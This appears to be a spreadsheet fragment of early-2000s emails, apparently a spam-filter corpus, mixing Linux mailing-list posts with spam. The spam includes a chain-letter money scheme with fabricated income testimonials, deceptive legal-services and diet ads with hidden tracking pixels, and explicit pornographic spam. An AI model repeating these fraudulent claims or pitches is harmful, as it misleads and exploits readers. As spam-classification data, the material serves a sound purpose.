 up my mind to participate in this plan.  But conservative that 
 I am, I decided that the initial investment was so little that 
 there was just no way that I wouldn't get enough orders to at 
 least get my money back''.  '' I was surprised when I found my 
 medium size post office box crammed with orders.  I made a large 
 6 figure income in the first 12 weeks.  The nice thing about this 
 deal is that it does not matter where people live.  There simply 
 isn't a better investment with a faster return and so big''.
 Dan
 Sondstrom, Alberta,
 Canada
 ================================================================
 '' I had received this program before.  I deleted it, but later 
 I wondered if I should have given it a try.  Of course, I had no 
 idea who to contact to get another copy, so I had to wait until 
 I was e-mailed again by someone else ........ 11 months passed 
 then it luckily came again ...... I did not delete this one! I 
 made a six figure income on my first try and all the money came
 within 22 weeks''. 
 Susan De Suza, New York, N.Y.
 ================================================================
 '' It really is a great opportunity to make relatively easy money 
 with little cost to you.  I followed the simple instructions 
 carefully and within 10 days the money started to come in.  My 
 first month I made a substantial income and by the end of the
 third month my total cash count was a healthy 6 figure income.
 Life is beautiful, Thanks to internet''. 
 Fred Dellaca, Westport, New Zealand
 ================================================================
 ORDER YOUR REPORTS TODAY AND GET STARTED ON
 YOUR ROAD TO GENERATING EXTRA INCOME! 
 ================================================================
 Disclaimer:
 The sender or participants of this marketing program cannot
 verify any monetary claims made in this document, nor do they
 assume responsibility for same. As with any business you have
 the risk of loss. No "guarantee" can be made as to the amount
 of money you will make, or the benefits you may receive with
 this program. This is NOT a Chain Letter. We advertise the
 sale of information and a legal business of reselling that
 information. If you have any doubts, please consult your
 attorney.
 ==========================================================
            BEST OF LUCK IN YOUR NEW BUSINESS VENTURE!!
 26138654332222
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Need a Lawyer?
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_257750315551863
 Content-Type: text/plain;
 	charset=us-ascii
 Content-Transfer-Encoding: 7BIT
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Pennies a day&lt;/TITLE&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=windows-1252"&gt;
 &lt;META content="MSHTML 6.00.2716.2200" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY text=#000000 bgColor=#ffffff&gt;
 &lt;DIV align=center&gt;&lt;/DIV&gt;
 &lt;CENTER&gt;&lt;TABLE cellSpacing=0 cellPadding=0 width=425 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD align=middle bgColor=#502080 height=30&gt;&lt;A href="http://65.118.38.254" target="_"&gt;&lt;FONT face=tahoma,arial color=white size=3&gt;&lt;B&gt;Legal Services for Less than a Penny Per Day&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt; &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;
 &lt;CENTER&gt;&lt;TABLE cellSpacing=0 cellPadding=6 width=425 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD vAlign=top bgColor=#dfdff3&gt;&lt;FONT face="Arial, Helvetica, sans-serif" size=2&gt;You can have a &lt;B&gt;Top Law Firm&lt;/B&gt; in your area produce a Will for you, &lt;B&gt;absolutely FREE&lt;/B&gt;, with your membership.&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;
 &lt;TABLE cellSpacing=0 cellPadding=5 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR vAlign=center&gt;
 &lt;TD width="100%"&gt;&lt;B&gt;&lt;FONT face="Arial, Helvetica, sans-serif" color=#000000 size=2&gt;&lt;ul&gt;
 &lt;li&gt;&amp;nbsp;Unlimited Legal Consultations&lt;BR&gt;
 &lt;li&gt;&amp;nbsp;Unlimited Phone Conversations&lt;BR&gt;
 &lt;li&gt;&amp;nbsp;Traffic Ticket Defense&lt;BR&gt;
 &lt;li&gt;&amp;nbsp;Contract &amp;amp; Document Review&lt;BR&gt;
 &lt;li&gt;&amp;nbsp;Letters and Calls Made on Your Behalf&lt;BR&gt;
 &lt;li&gt;&amp;nbsp;IRS Audit Protection&lt;BR&gt;
 &lt;li&gt;&amp;nbsp;Trial Defense&lt;BR&gt;
 &lt;li&gt;&amp;nbsp;Business &amp;amp; Family Protection&lt;BR&gt;
 &lt;li&gt;&amp;nbsp;Much More... &lt;/FONT&gt;&lt;/B&gt;&lt;/ul&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;FONT face="Arial, Helvetica, sans-serif" size=2&gt;&lt;BR&gt;&lt;B&gt;Why pay $200 or more&lt;/B&gt; an hour&lt;B&gt; when you can get the same&lt;/B&gt; first rate service&lt;B&gt; for less than $1 per day?&lt;/B&gt;&lt;BR&gt;&lt;BR&gt;&lt;FONT color=#663366&gt;&lt;B&gt;Get your "FREE INFORMATION" by clicking on the link below.&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;CENTER&gt;&lt;TABLE cellSpacing=0 cellPadding=0 width=425 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD align=middle bgColor=#502080 height=40&gt;&lt;A href="http://65.118.38.254" target="_"&gt;&lt;FONT face=tahoma,arial color=white size=4&gt;&lt;B&gt;Get your "Free Information" now!!&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt; &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;CENTER&gt;&lt;BR&gt;&lt;HR width="75%" SIZE=1&gt;&lt;/CENTER&gt;
 &lt;P align=center&gt;&lt;FONT face=Verdana,Arial size=1&gt;For no further notice at no cost and to be  disolved from all of our databases, simply  "r e p l y"  to this message with the word "D i s c o n t i n u e" in the subject line.&lt;/FONT&gt;&lt;/P&gt;
 &lt;IMG height=1 
 src="http://65.118.38.254/blank.gif" width=1&gt;
 &lt;/BODY&gt;&lt;/HTML&gt;IZ3
 ------=_NextPart_257750315551863
 Content-Type: text/html;
 	charset=iso-8859-1
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Pennies a day&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-1252"&gt;
 &lt;META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY text=3D#000000 bgColor=3D#ffffff&gt;
 &lt;DIV align=3Dcenter&gt;&lt;/DIV&gt;
 &lt;CENTER&gt;&lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D425 border=3D0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD align=3Dmiddle bgColor=3D#502080 height=3D30&gt;&lt;A href=3D"http://65.118.38.254" =
 target=3D"_"&gt;&lt;FONT face=3Dtahoma,arial color=3Dwhite size=3D3&gt;&lt;B&gt;Legal Services for =
 Less than a Penny Per Day&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt; &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;
 &lt;CENTER&gt;&lt;TABLE cellSpacing=3D0 cellPadding=3D6 width=3D425 border=3D0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD vAlign=3Dtop bgColor=3D#dfdff3&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" =
 size=3D2&gt;You can have a &lt;B&gt;Top Law Firm&lt;/B&gt; in your area produce a Will for you, =
 &lt;B&gt;absolutely FREE&lt;/B&gt;, with your membership.&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;
 &lt;TABLE cellSpacing=3D0 cellPadding=3D5 width=3D"100%" border=3D0&gt;
 &lt;TBODY&gt;
 &lt;TR vAlign=3Dcenter&gt;
 &lt;TD width=3D"100%"&gt;&lt;B&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" color=3D#000000 =
 size=3D2&gt;&lt;ul&gt;
 &lt;li&gt;&amp;nbsp;Unlimited Legal Consultations&lt;BR&gt;
 &lt;li&gt;&amp;nbsp;Unlimited Phone Conversations&lt;BR&gt;
 &lt;li&gt;&amp;nbsp;Traffic Ticket Defense&lt;BR&gt;
 &lt;li&gt;&amp;nbsp;Contract &amp;amp; Document Review&lt;BR&gt;
 &lt;li&gt;&amp;nbsp;Letters and Calls Made on Your Behalf&lt;BR&gt;
 &lt;li&gt;&amp;nbsp;IRS Audit Protection&lt;BR&gt;
 &lt;li&gt;&amp;nbsp;Trial Defense&lt;BR&gt;
 &lt;li&gt;&amp;nbsp;Business &amp;amp; Family Protection&lt;BR&gt;
 &lt;li&gt;&amp;nbsp;Much More... &lt;/FONT&gt;&lt;/B&gt;&lt;/ul&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;FONT face=3D"Arial, Helvetica, sans-serif" size=3D2&gt;&lt;BR&gt;&lt;B&gt;Why pay $200 or =
 more&lt;/B&gt; an hour&lt;B&gt; when you can get the same&lt;/B&gt; first rate service&lt;B&gt; for =
 less than $1 per day?&lt;/B&gt;&lt;BR&gt;&lt;BR&gt;&lt;FONT color=3D#663366&gt;&lt;B&gt;Get your "FREE =
 INFORMATION" by clicking on the link below.=
 &lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;CENTER&gt;&lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D425 border=3D0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD align=3Dmiddle bgColor=3D#502080 height=3D40&gt;&lt;A href=3D"http://65.118.38.254" =
 target=3D"_"&gt;&lt;FONT face=3Dtahoma,arial color=3Dwhite size=3D4&gt;&lt;B&gt;Get your "Free =
 Information" now!!&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt; &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;CENTER&gt;&lt;BR&gt;&lt;HR width=3D"75%" SIZE=3D1&gt;&lt;/CENTER&gt;
 &lt;P align=3Dcenter&gt;&lt;FONT face=3DVerdana,Arial size=3D1&gt;For no further notice at no =
 cost and to be  disolved from all of our databases, simply  "r e p l y"  to =
 this message with the word "D i s c o n t i n u e" in the subject line.=
 &lt;/FONT&gt;&lt;/P&gt;
 &lt;IMG height=3D1 
 src=3D"http://65.118.38.254/blank.gif" width=3D1&gt;
 &lt;/BODY&gt;&lt;/HTML&gt;IZ3
 ------=_NextPart_257750315551863--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Huh?
</t>
  </si>
  <si>
    <t xml:space="preserve">Despite my lack of confidence to upgrade to 2.41 using the tarball instead of 
 cpan, it worked.  With the help of others, got razor working.  I did however 
 notice something in my logs which happened twice but hasn't recurred.
 Sep  8 16:10:11 omega spamd[14014]: razor2 check skipped: Permission denied 
 Can't call method "log" on unblessed reference at 
 /usr/lib/perl5/site_perl/5.6.1/Razor2/Client/Agent.pm line 211, &lt;STDIN&gt; line 
 66.
 -- 
 Robin Lynn Frank
 Paradigm-Omega, LLC
 ==================================
 The only certainty about documentation is that
 whoever wrote it "might" have understood it.
 The rest of us may not be so lucky.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</si>
  <si>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Brian O'Donoghue asked:
 &gt; &gt; Of course, it would require a minimum of EUR300,000 in funding
 &gt;
 &gt; It would?
 Well, yes, if I were to add all the frilly pink bits and the crunchy
 chocolate flavoured pieces... :)
 Seriously, I can only see two reasons to start another distro: you have
 something fundamentally different to offer, or you are customising an
 existing distro for an unusual and specific situation. Between
 Mandrake/YellowDog, RedHat/SuSe and Debian you have enough options to cover
 most day-to-day requirements. And a lot of the specific situations are
 already covered (smoothwall, familiar, etc.)
 Therefore, if I were to create a new Linux distribution, I would have to
 spend time crafting it so that it offers a lot more than existing
 alternatives. My requirements normally involve better support/easier
 maintenance, and if one follows the logic through, this would require a
 company to be behind such an initiative.
 I imagine it would be possible to create a new distribution in about one
 week[1]. For example: take Debian as your base, slap a specific set of
 packages on CD, change a few config files, mention that it has been untested
 on most hardware variations, and voila, a "new" distie. :)
 - Matthew
 [1] That is, IT weeks. 1 IT week ~= two months. :)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</si>
  <si>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Subject: Get 12 free Burgers + 1/2 Price Omaha Steaks!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body background="http://a725.g.akamai.net/7/725/1095/0001/www.omahasteaks.com/gifs/email/dotcom_3rdparty_bkg.gif" MARGINWIDTH="0" MARGINHEIGHT="0"&gt;&lt;div align="center"&gt;&lt;span style="font-family:arial; font-size:12px; color:black"&gt;
 &lt;table width="100%" leftmargin="0" topmargin="0" border="0" cellpadding="0" cellspacing="0" background="http://a725.g.akamai.net/7/725/1095/0001/www.omahasteaks.com/gifs/email/dotcom_3rdparty_bkg.gif" style="border-collapse: collapse" bordercolor="#111111"&gt;
 &lt;tr&gt;&lt;td align="center"&gt;&lt;font color="#FFFFFF" size="1"&gt;This message was not sent
   to you unsolicited. You received this email as a member of &lt;b&gt;SendGreatOffers.com&lt;/b&gt;.&lt;br&gt;
  Unsubscription instructions are at the bottom of the message&lt;/font&gt;&lt;font size="2" color="#FFFFFF"&gt;&lt;br&gt;
  &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;&lt;table width="541" border="0" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;span style="font-family:arial; font-size:12px; color:black"&gt;
   &lt;a href="http://admanmail.com/server/c.asp?ad_key=AIVRWBPFEVOV&amp;ext=1"&gt;&lt;img src="http://a725.g.akamai.net/7/725/1095/0001/www.omahasteaks.com/gifs/email/dotcom_3rdgen01a.gif" width="405" height="34" border="0"&gt;&lt;br&gt;&lt;img src="http://a725.g.akamai.net/7/725/1095/0001/www.omahasteaks.com/gifs/email/dotcom_3rdgen02a.gif" width="405" height="69" border="0"&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;
   &lt;a href="http://admanmail.com/server/c.asp?ad_key=AIVRWBPFEVOV&amp;ext=1"&gt;&lt;img src="http://a725.g.akamai.net/7/725/1095/0001/www.omahasteaks.com/gifs/email/dotcom_3rdgen03.gif" width="136" height="103" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table width="541" border="0" cellpadding="3" cellspacing="0" background="http://a725.g.akamai.net/7/725/1095/0001/www.omahasteaks.com/gifs/email/fill_00AD00.gif"&gt;&lt;tr&gt;&lt;td&gt;&lt;table width="535" border="0" cellpadding="0" cellspacing="0" background="http://a725.g.akamai.net/7/725/1095/0001/www.omahasteaks.com/gifs/email/fill_CC0000.gif"&gt;&lt;tr&gt;
     &lt;td height="25" align="center"&gt;&lt;span style="font-family:arial; font-size:16px; color:white"&gt;&lt;b&gt;GIVE THE GIFT OF EXCEPTIONAL TASTE!&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
       &lt;td&gt;&lt;a href="http://admanmail.com/server/c.asp?ad_key=AIVRWBPFEVOV&amp;ext=1"&gt;&lt;img src="http://a725.g.akamai.net/7/725/1095/0001/www.omahasteaks.com/gifs/email/dotcom_3rdgen06.jpg" width="260" height="268" border="0"&gt;&lt;img src="http://a725.g.akamai.net/7/725/1095/0001/www.omahasteaks.com/gifs/email/dotcom_3rdgen07.gif" width="275" height="268" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
       &lt;td height="25" align="center"&gt;&lt;span style="font-family:arial; font-size:16px; color:#F7ED31"&gt;&lt;b&gt;SAVE 50% on these Best Sellers...&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
     &lt;span style="font-family:arial; font-size:12px; color:black"&gt;&lt;tr&gt;
       &lt;td height="25" align="center"&gt;&lt;span style="font-family:arial; font-size:12px; color:white"&gt;&lt;b&gt;Prefer to order by phone? &lt;span style="color:#FFFF00"&gt;CALL 1.800.960.8400&lt;/span&gt;&amp; mention coupon code RZ3073.&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table width="541" border="0" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td colspan="3"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;
 &lt;img src="http://admanmail.com/server/v.asp?ad_key=AIVRWBPFEVOV"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</si>
  <si>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Re: [ILUG] [OT] Dell machine giving me hassle.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I'm not familiar with Dell Dimension XPS, and, to be honest, not familiar
 with any brand-name computers. Most of my experience is China
 motherboards, but I've seen same behavior once. Changing the battery helps
 that time. It was big round battery with 'Panasonic' on it.
 Computer starts beeping then we removed battery from MB. It even booted up
 (well, loosing time and some other things).
 Just my 2 cents.
 Misha
 On Wed, 28 Aug 2002, Aherne Peter-pahern02 wrote:
 &gt; Ok, Iknow this is blatantly OT but I'm beginning to go insane.
 &gt; Had an old Dell Dimension XPS sitting in the corner and decided to
 &gt; put it to use,
 &lt;snip&gt;
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --]&gt; A Green once said that if the Spotted Owl hadn't existed they
 --]&gt; would have had to invent it.
 --]A Republican once said "I am not a crook".
 --]
 Oh great, another round of Lableisms....Let me know when you get back to
 real data..
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Benjamin Wallace Higgins
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "t" == tomwhore  &lt;Tom&gt; writes:
     t&gt; The first pewp...man they prep you for it but northing really
     t&gt; can...Wowzer that stuff is road tar.
 First kid, eh? ;)
 No, there's no prep for it.  No prep for the fifth either.  If you have
 any parenting guidance books, burn them now.
 Congratulations; kudos and regards to the mum.  It don't matter how it
 happened so long as everyone's ok.
 Starting today, that's three lives that will never be the same.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: zzzz,Increase your breast size. 100% safe!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: WOMEN WITH CUM ON THEIR FACE!!!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Fantastic Facials!&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#000000" text="#000000"&gt;
 &lt;div align="center"&gt;
   &lt;table width=700 border=0 cellpadding=0 cellspacing=0&gt;
     &lt;tr&gt;
       &lt;td rowspan=2&gt;
       &lt;A HREF="http://www.jeweldive.com:81/nsi/facial/index.html"&gt;
         &lt;img src="http://www.jeweldive.com:81/nsi/facial/700x400_01.jpg" width=219 height=131 border=0&gt;&lt;/a&gt;&lt;/td&gt;
       &lt;td&gt;
       &lt;A HREF="http://www.jeweldive.com:81/nsi/facial/index.html"&gt;
         &lt;img src="http://www.jeweldive.com:81/nsi/facial/700x400_02.jpg" width=97 height=63 border=0&gt;&lt;/a&gt;&lt;/td&gt;
       &lt;td colspan=2 rowspan=2&gt;
       &lt;A HREF="http://www.jeweldive.com:81/nsi/facial/index.html"&gt;
         &lt;img src="http://www.jeweldive.com:81/nsi/facial/700x400_03.jpg" width=384 height=131 border=0&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td&gt;
       &lt;A HREF="http://www.jeweldive.com:81/nsi/facial/index.html"&gt;
         &lt;img src="http://www.jeweldive.com:81/nsi/facial/700x400_anime1.gif" width=97 height=68 border=0&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td colspan=2&gt;
       &lt;A HREF="http://www.jeweldive.com:81/nsi/facial/index.html"&gt;
         &lt;img src="http://www.jeweldive.com:81/nsi/facial/700x400_05.jpg" width=316 height=113 border=0&gt;&lt;/a&gt;&lt;/td&gt;
       &lt;td rowspan=3&gt;
       &lt;A HREF="http://www.jeweldive.com:81/nsi/facial/index.html"&gt;
         &lt;img src="http://www.jeweldive.com:81/nsi/facial/700x400_06.jpg" width=140 height=269 border=0&gt;&lt;/a&gt;&lt;/td&gt;
       &lt;td&gt;
       &lt;A HREF="http://www.jeweldive.com:81/nsi/facial/index.html"&gt;
         &lt;img src="http://www.jeweldive.com:81/nsi/facial/700x400_07.jpg" width=244 height=113 border=0&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td colspan=2&gt;
       &lt;A HREF="http://www.jeweldive.com:81/nsi/facial/index.html"&gt;
         &lt;img src="http://www.jeweldive.com:81/nsi/facial/700x400_08.jpg" width=316 height=92 border=0&gt;&lt;/a&gt;&lt;/td&gt;
       &lt;td rowspan=2&gt;
       &lt;A HREF="http://www.jeweldive.com:81/nsi/facial/index.html"&gt;
         &lt;img src="http://www.jeweldive.com:81/nsi/facial/700x400_09.gif" width=244 height=156 border=0&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td colspan=2&gt;
       &lt;A HREF="http://www.jeweldive.com:81/nsi/facial/index.html"&gt;
         &lt;img src="http://www.jeweldive.com:81/nsi/facial/700x400_anime3.gif" width=316 height=64 border=0&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;center&gt;
 &lt;p&gt;&lt;a href=http://www.wowthisiscool.net:81/removal/boca/&gt;Click here to be removed&lt;/a&gt;
 &lt;/center&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: WiFi Trek badges
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85490092
 Date: Not supplied
 Brian sez: Vocera Communications has developed what is essentially a Star Trek: 
 TNG-style lapel communicator device that uses WiFi to transmit voice across 
 networks. 
     The Vocera Communications System consists of Vocera Server Software, 
     residing on a customer premise server, and Vocera Communications Badges, 
     which operate over a wireless LAN (802.11b). The badge - which weighs less 
     than 2 ounces - includes a microphone and speaker, LCD readout to display 
     text messages, and an 802.11b wireless radio. It can be clipped to a shirt 
     pocket or collar, or worn on a lanyard.  
 Link[1] Discuss[2] (_Thanks, Brian[3]!_)
 [1] http://www.vocera.com/news/press9.shtm
 [2] http://www.quicktopic.com/boing/H/F4SLvqGh6XW
 [3] http://brian.carnell.com
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 13 Sep 2002, Tony L. Svanstrom mused:
 &gt; On Fri, 13 Sep 2002 the voices made carlo@alinoe.com write:
 &gt; 
 &gt;&gt; What do spammers do with email addresses in
 &gt;&gt; their database that are undeliverable for a
 &gt;&gt; few years?  Do they still continue to spam
 &gt;&gt; them?
 &gt; 
 &gt;  Yes.
 So much so that I get thousands of bounces per day on this machine aimed
 at what are plainly message-ids...
 -- 
 `Let's have a round of applause for those daring young men
  and their flying spellcheckers.' --- Meg Worley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</si>
  <si>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
 &lt;html&gt;&lt;head&gt;&lt;title&gt;Internet Services Weekly Newsletter&lt;/title&gt;&lt;/head&gt;
 &lt;body bgcolor=3D"#eeeeee"&gt;&lt;center&gt;
 &lt;a href=3D"top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D612 bgcolor=3D"#f=
 fffff"&gt;
 &lt;tr valign=3Dtop&gt;&lt;td width=3D442 colspan=3D4&gt;&lt;img src=3D"http://www.cnet.co=
 m/i/nl/ws/hd.gif" width=3D442 height=3D60 alt=3D"Internet Services Weekly N=
 ewsletter"&gt;&lt;br&gt;
 =09=09=09&lt;table width=3D442 cellpadding=3D0 cellspacing=3D0 border=3D0 bgco=
 lor=3D"#ffcc00"&gt;
 =09=09=09=09&lt;tr&gt;&lt;td bgcolor=3D"#000000" colspan=3D3&gt;&lt;img src=3D"http://home=
 .cnet.com/b.gif" width=3D"1" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 =09=09=09=09&lt;tr&gt;
 =09=09=09=09=09&lt;td bgcolor=3D"#000000" width=3D1 rowspan=3D2&gt;&lt;img src=3D"ht=
 tp://home.cnet.com/b.gif" width=3D"1" height=3D"10" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09=09=09=09=09&lt;td width=3D10 rowspan=3D2&gt;&lt;img src=3D"http://home.cnet.com/=
 b.gif" width=3D"1" height=3D"10" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09=09=09=09=09&lt;td  width=3D430&gt;&lt;img src=3D"http://home.cnet.com/b.gif" wid=
 th=3D"1" height=3D"10" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09=09=09=09&lt;/tr&gt;
 =09=09=09=09&lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.=
 gif" width=3D"1" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
       =09=09&lt;/table&gt;=09
 =09&lt;/td&gt;
 &lt;!-- Skyscraper column --&gt;
 =09&lt;td width=3D160 rowspan=3D2&gt;
 =09=09&lt;img src=3D"http://home.cnet.com/i/dp/dd_b.gif" width=3D"160" height=
 =3D"18" border=3D"0"&gt;&lt;br&gt;
 =09=09&lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D160&gt;
 =09=09&lt;tr&gt;&lt;td align=3Dcenter bgcolor=3D"#eeeeee"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 =09=09&lt;/table&gt;
 &lt;!-- tower ad --&gt;
 &lt;div align=3D"center"&gt;&lt;img src=3D"http://i.i.com.com/cnwk.1d/Ads/common/adv=
 ertisement.gif" width=3D"120" height=3D"10" border=3D"0"&gt;&lt;/br&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D07-HqCzI5r7tUCHumOiqzUbrvL=
 kiDZR" target=3D"new"&gt;  =20
 &lt;img src=3D"http://www.techrepublic.com/images/ads/Gateway.sky.advice_0602.=
 gif" width=3D"160" height=3D"600" border=3D"0"&gt;
 &lt;/a&gt;&lt;/div&gt;
 &lt;!-- /tower ad --&gt;&lt;!-- right column content --&gt;
 &lt;!-- most popular NEWSLETTER --&gt;
 &lt;br&gt;&lt;img src=3D"http://www.cnet.com/i/nl/ws/rhc_pop.gif" width=3D150 height=
 =3D20 alt=3D"Most Popular"&gt;
 &lt;br&gt;&lt;font face=3D"arial, helvetica" size=3D-1 color=3D#333333&gt;
 &lt;b&gt;Reseller Accounts&lt;/b&gt;&lt;br&gt;&lt;table width=3D150 cellpadding=3D2 cellspacing=
 =3D0 border=3D0&gt;&lt;tr valign=3Dtop&gt;&lt;td&gt;&lt;font face=3D"arial, helvetica" size=
 =3D-2&gt;&lt;b&gt;1.&lt;/b&gt;&amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D1c-cs=
 _iIFraA8NaOl5n9kgGa2oXqGdR" &gt;Infinology&amp;nbsp;Corp.&lt;/a&gt;, &lt;a href=3D"http://c=
 lickthru.online.com/Click?q=3D31-V_YRIjMwkavzq0dyLxjkqVAXXbcR" &gt;$59&lt;/a&gt;&lt;br&gt;=
 &lt;b&gt;2.&lt;/b&gt;&amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D47-ADmxIIZx=
 2oOTTBBOiJGu_NEsnEPR" &gt;ReadyHosting.com&lt;/a&gt;, &lt;a href=3D"http://clickthru.on=
 line.com/Click?q=3D5c-BnjPIZnWYPxi5mX53xlZk0f-IonR" &gt;$4.12&lt;/a&gt;&lt;br&gt;&lt;b&gt;3.&lt;/b&gt;=
 &amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D71-GwdUIEZXeNdOz9kqw=
 uBXvl3NU2rR" &gt;Aplus.Net&lt;/a&gt;, &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3D86-8fH1QCJm04JVpsxSjaeTldfVpfRR" &gt;$79.95&lt;/a&gt;&lt;br&gt;&lt;b&gt;4.&lt;/b&gt;&amp;nbsp;&lt;a href=
 =3D"http://clickthru.online.com/Click?q=3D9b-7-TFQSIm1AhPzm40dAVJ9PZAKTFR" =
